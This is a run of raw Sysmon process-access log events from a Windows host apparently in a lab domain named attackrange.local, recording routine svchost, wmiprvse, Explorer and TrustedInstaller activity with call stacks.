13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.601{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.601{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.601{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.601{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.601{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.601{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.398{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.398{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 